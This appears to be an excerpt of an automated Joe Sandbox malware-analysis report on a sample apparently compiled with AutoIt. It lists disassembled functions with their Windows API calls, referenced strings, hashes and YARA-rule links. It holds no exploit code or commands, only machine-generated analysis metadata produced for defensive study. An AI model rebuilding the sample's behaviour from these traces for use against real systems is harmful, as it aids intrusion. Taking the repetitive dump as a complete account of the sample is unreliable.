Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 7e554a5d515510021ed81fea9270d11c5909199a9f20176c7a7f5ee9a06febc8
Instruction ID: 8fc29cabbed34a8ba690cae76dc765377889c4c9ad7dd11a8d5b976208e352a8
Opcode Fuzzy Hash: 7e554a5d515510021ed81fea9270d11c5909199a9f20176c7a7f5ee9a06febc8
Instruction Fuzzy Hash: 870167B0902B5ABDE3008F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5

Function 0022EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0022EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0022EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0022EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0022EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0022EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0022EB75

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b6756b5979c98992c1bc146d58bf6e6fa0c9cc8a0826bd432bb853e8db0ccd08
Instruction ID: 0f7647a657199a24ed9b42c64e2c861f4dd67df4056ffdf29c8ef31f970626f1
Opcode Fuzzy Hash: b6756b5979c98992c1bc146d58bf6e6fa0c9cc8a0826bd432bb853e8db0ccd08
Instruction Fuzzy Hash: E0F01772240758BFE7215BA2AC0EEEB3A7CEBCAB12F104158F601D1091A6B05A0196B9

Function 00217439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00217452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00217469
GetWindowDC.USER32(?), ref: 00217475
GetPixel.GDI32(00000000,?,?), ref: 00217484
ReleaseDC.USER32(?,00000000), ref: 00217496
GetSysColor.USER32(00000005), ref: 002174B0

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 1ff4c6297249d0e8ab44f2ebea76be659c1815dc9b105ded6548a37b237d9b17
Instruction ID: 337f17e60509883ac2be37f1a19329c0810df9cb1186ac0bb7e89afbb130a015
Opcode Fuzzy Hash: 1ff4c6297249d0e8ab44f2ebea76be659c1815dc9b105ded6548a37b237d9b17
Instruction Fuzzy Hash: 60018B31410305EFEB205FA4EC0CBEA7BB5FB44312F610060F916A31A0DB311E51EB14

Function 00221874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0022187F
UnloadUserProfile.USERENV(?,?), ref: 0022188B
CloseHandle.KERNEL32(?), ref: 00221894
CloseHandle.KERNEL32(?), ref: 0022189C
GetProcessHeap.KERNEL32(00000000,?), ref: 002218A5
HeapFree.KERNEL32(00000000), ref: 002218AC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 85494d2014da8bbd8c76ee361d2b144214cb6d83bdfbedf809a3ae65a6205fb7
Instruction ID: b52c9f9aa41aa73afa1cdd96f68b2afb94efced330d42157b281285eb5243207
Opcode Fuzzy Hash: 85494d2014da8bbd8c76ee361d2b144214cb6d83bdfbedf809a3ae65a6205fb7
Instruction Fuzzy Hash: 1CE0C936004705BFDB016BA1FD0C905BB69FB497227208220F22981470DB325460DB54

Function 001CBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001CBEB3

Strings

D%), xrefs: 001CBE9A
D%), xrefs: 001CBCA2
D%)D%), xrefs: 001CBCA5
D%), xrefs: 001CBDED, 001CBD91, 001CBD1B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%)$D%)$D%)$D%)D%)
API String ID: 1385522511-2662032602
Opcode ID: a0af45b1e98306f48208db10c923b1ca8d9b79ad12a1d6b6d9f2febc4f4dd401
Instruction ID: bd77e61bc35bdb95d60ae3011f7c6ea65d33deca075254a602fcda714fece356
Opcode Fuzzy Hash: a0af45b1e98306f48208db10c923b1ca8d9b79ad12a1d6b6d9f2febc4f4dd401
Instruction Fuzzy Hash: 57911775A0420ADFCB18CF99C092AAAB7F1FF68314F65416ED946EB350D731E981CB90

Function 00247B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 001E0242: EnterCriticalSection.KERNEL32(0029070C,00291884,?,?,001D198B,00292518,?,?,?,001C12F9,00000000), ref: 001E024D
Part of subcall function 001E0242: LeaveCriticalSection.KERNEL32(0029070C,?,001D198B,00292518,?,?,?,001C12F9,00000000), ref: 001E028A

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 001E00A3: __onexit.LIBCMT ref: 001E00A9

__Init_thread_footer.LIBCMT ref: 00247BFB

Part of subcall function 001E01F8: EnterCriticalSection.KERNEL32(0029070C,?,?,001D8747,00292514), ref: 001E0202
Part of subcall function 001E01F8: LeaveCriticalSection.KERNEL32(0029070C,?,001D8747,00292514), ref: 001E0235

Strings

+T!, xrefs: 00247E2E
G, xrefs: 00247C7F
Variable must be of type 'Object'., xrefs: 00247C3A
5, xrefs: 00247C78

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +T!$5$G$Variable must be of type 'Object'.
API String ID: 535116098-1390543779
Opcode ID: 41ae315846ee6d8648188f0b893d651b33fa06392ef1a3185e02eae0a10e9240
Instruction ID: 36368f407ce7c179ad650e685b2a1dc531a7a0e1347e2cdeb5f80e735cd4040b
Opcode Fuzzy Hash: 41ae315846ee6d8648188f0b893d651b33fa06392ef1a3185e02eae0a10e9240
Instruction Fuzzy Hash: DE91AC70A24209EFCB08EF94D881DBDB7B1FF58304F508059F816AB292DB71AE65CB50

Function 0022C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C7620: _wcslen.LIBCMT ref: 001C7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0022C6EE
_wcslen.LIBCMT ref: 0022C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0022C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0022C7CA

Strings

0, xrefs: 0022C6AF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: eea72c8b1418cce316d5e0a3aa77d98169009fc2be4ba84d10a8fa5840fec056
Instruction ID: 8ecfdec792d40abb6056c329c8910355d399c511be2c134560d62453d3371b9a
Opcode Fuzzy Hash: eea72c8b1418cce316d5e0a3aa77d98169009fc2be4ba84d10a8fa5840fec056
Instruction Fuzzy Hash: DE51F371624322ABD7109FA8E845B6EB7E8AF99310F24062DF995D31D0DB70D924CB52

Function 0024AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0024AEA3

Part of subcall function 001C7620: _wcslen.LIBCMT ref: 001C7625

GetProcessId.KERNEL32(00000000), ref: 0024AF38
CloseHandle.KERNEL32(00000000), ref: 0024AF67

Strings

<, xrefs: 0024AE6B
@, xrefs: 0024AE72

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 9359edd747f1c59b58e93f97192228e210d86ed65999eff22abcc15888d8cc6b
Instruction ID: 979f21350c2b23f0c2e758e73f9009e37ca1a7fb80ebd067a6eec528bdcba4c5
Opcode Fuzzy Hash: 9359edd747f1c59b58e93f97192228e210d86ed65999eff22abcc15888d8cc6b
Instruction Fuzzy Hash: 2F716670A00619DFCB18DF94D485A9EBBF0BF18304F0484ADE816AB3A2CB71ED55CB91

Function 0022719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00227206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0022723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0022724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002272CF

Strings

DllGetClassObject, xrefs: 00227242

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 0b751174579aeaf788aca559e169594ef917e2b5424cb71a9d6f7ca1f6fd16c5
Instruction ID: 24358c053e1b5323c1c36569f2cd2c6f436c1f363a0ca2506e36e2269543eecb
Opcode Fuzzy Hash: 0b751174579aeaf788aca559e169594ef917e2b5424cb71a9d6f7ca1f6fd16c5
Instruction Fuzzy Hash: ED418F71A18215EFDB15CF94D884A9A7BB9EF44310F2481ADFD059F20AD7B0D954CBA0

Function 00253D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00253E35
IsMenu.USER32(?), ref: 00253E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00253E92
DrawMenuBar.USER32 ref: 00253EA5

Strings

0, xrefs: 00253D89

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: c7385275bf09afd03a0271a9c4190819bd16926362169a693562385ccd39803b
Instruction ID: e61bde6a7b24aee458fc7c95fc67faf2ec608be4e330835d761d145a53ca99bd
Opcode Fuzzy Hash: c7385275bf09afd03a0271a9c4190819bd16926362169a693562385ccd39803b
Instruction Fuzzy Hash: 2F416C75A1020AAFDB10DF50E889E9AB7F5FF48395F044019ED05A7250D730AE68CF64

Function 00221DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00221E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00221E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00221EA9

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

Strings

ComboBox, xrefs: 00221DF0
ListBox, xrefs: 00221E25

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 27dc37d6f5f3391be5630f96678c2bfd669d827450a64bf666833c9959dc0d0e
Instruction ID: 18f592f47bea79557be25352581de25bbe99699caf4474aa4d97cf907cdeb591
Opcode Fuzzy Hash: 27dc37d6f5f3391be5630f96678c2bfd669d827450a64bf666833c9959dc0d0e
Instruction Fuzzy Hash: E321F671A10214BEDB18AFA4EC49DFFB7BCDF65350B104129F825A71E1DB784A299620

Function 0024C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0024C9F1
_wcslen.LIBCMT ref: 0024CA68
_wcslen.LIBCMT ref: 0024CA9E
_wcslen.LIBCMT ref: 0024CAF9
_wcslen.LIBCMT ref: 0024CB2F
_wcslen.LIBCMT ref: 0024CB7F

Strings

HKLM, xrefs: 0024CA98, 0024CA9D
HKEY_LOCAL_MACHINE, xrefs: 0024CA62, 0024CA67

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: 4d0cdab67183c75e610f7a1c76202175424fce9d290112c5de4487f1a741c5ef
Instruction ID: 6f56fb09397a4d8004bdd6773a08126f8c9c46155a132dc27e103bd39a677f94
Opcode Fuzzy Hash: 4d0cdab67183c75e610f7a1c76202175424fce9d290112c5de4487f1a741c5ef
Instruction Fuzzy Hash: FA312873A2257B4BCB68EF2DD8405BE33915BB1754B354029E851AB345FB71CD64C3A0

Function 00252F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00252F8D
LoadLibraryW.KERNEL32(?), ref: 00252F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00252FA9
DestroyWindow.USER32(?), ref: 00252FB1

Strings

SysAnimate32, xrefs: 00252F68

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 95e5eab88730a4a07601a09bc864d2fa3517115348fc59af663b9cc3c13da263
Instruction ID: ff2813913da1f0a9b2e059a0ed473ef566a8bab7c5da76b22088074756718f78
Opcode Fuzzy Hash: 95e5eab88730a4a07601a09bc864d2fa3517115348fc59af663b9cc3c13da263
Instruction Fuzzy Hash: D9218B71224206EBEB104F64AC84EBB37B9EB5A366F100218FD50E65D0D771DC699B68

Function 001E4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001E4D1E,001F28E9,?,001E4CBE,001F28E9,002888B8,0000000C,001E4E15,001F28E9,00000002), ref: 001E4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001E4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,001E4D1E,001F28E9,?,001E4CBE,001F28E9,002888B8,0000000C,001E4E15,001F28E9,00000002,00000000), ref: 001E4DC3

Strings

mscoree.dll, xrefs: 001E4D86
CorExitProcess, xrefs: 001E4D98

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 47744f8e1852f4b02a9405aac50a7c530075e52cec630ce1443d37572c739eb9
Instruction ID: 7959bf3c9dbba15291cec860d5f6bf827f6df84735b376c03a7ff7208e35757e
Opcode Fuzzy Hash: 47744f8e1852f4b02a9405aac50a7c530075e52cec630ce1443d37572c739eb9
Instruction Fuzzy Hash: BCF04F34A40708BFDB159F91EC4DBAEBBB5EF54752F1040A4F80AA22A0DB705E90DB94

Function 001C4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001C4EDD,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001C4EAE
FreeLibrary.KERNEL32(00000000,?,?,001C4EDD,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4EC0

Strings

kernel32.dll, xrefs: 001C4E94
Wow64DisableWow64FsRedirection, xrefs: 001C4EA8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 340b39713c6bfe847731c27a89b111fb6349354818c64a50bb637f3535c1cc01
Instruction ID: e35eaec2ddb959e9f81e2cf42cccafa08902b4a9d803dc6773e518da4c9614d2
Opcode Fuzzy Hash: 340b39713c6bfe847731c27a89b111fb6349354818c64a50bb637f3535c1cc01
Instruction Fuzzy Hash: BBE08635A06B225F922117257C2CF5B6754AF92F637164119FC04E2140EB78CD0181B8

Function 001C4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00203CDE,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001C4E74
FreeLibrary.KERNEL32(00000000,?,?,00203CDE,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E87

Strings

kernel32.dll, xrefs: 001C4E5B
Wow64RevertWow64FsRedirection, xrefs: 001C4E6E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 28b39919ab65a979d566b0facb85e50d0076c22c776a63d55f43c92c1e0802c1
Instruction ID: f5c98786b7904521d58f13c90291c49f5d2e4020326a3f0710f85b383baabf5b
Opcode Fuzzy Hash: 28b39919ab65a979d566b0facb85e50d0076c22c776a63d55f43c92c1e0802c1
Instruction Fuzzy Hash: 31D0C235506B215B66221B287C2CE8B6B18AF86F133164118BC08A2110EF38CD01C1E8

Function 0024A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0024A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0024A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0024A468
CloseHandle.KERNEL32(?), ref: 0024A63D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
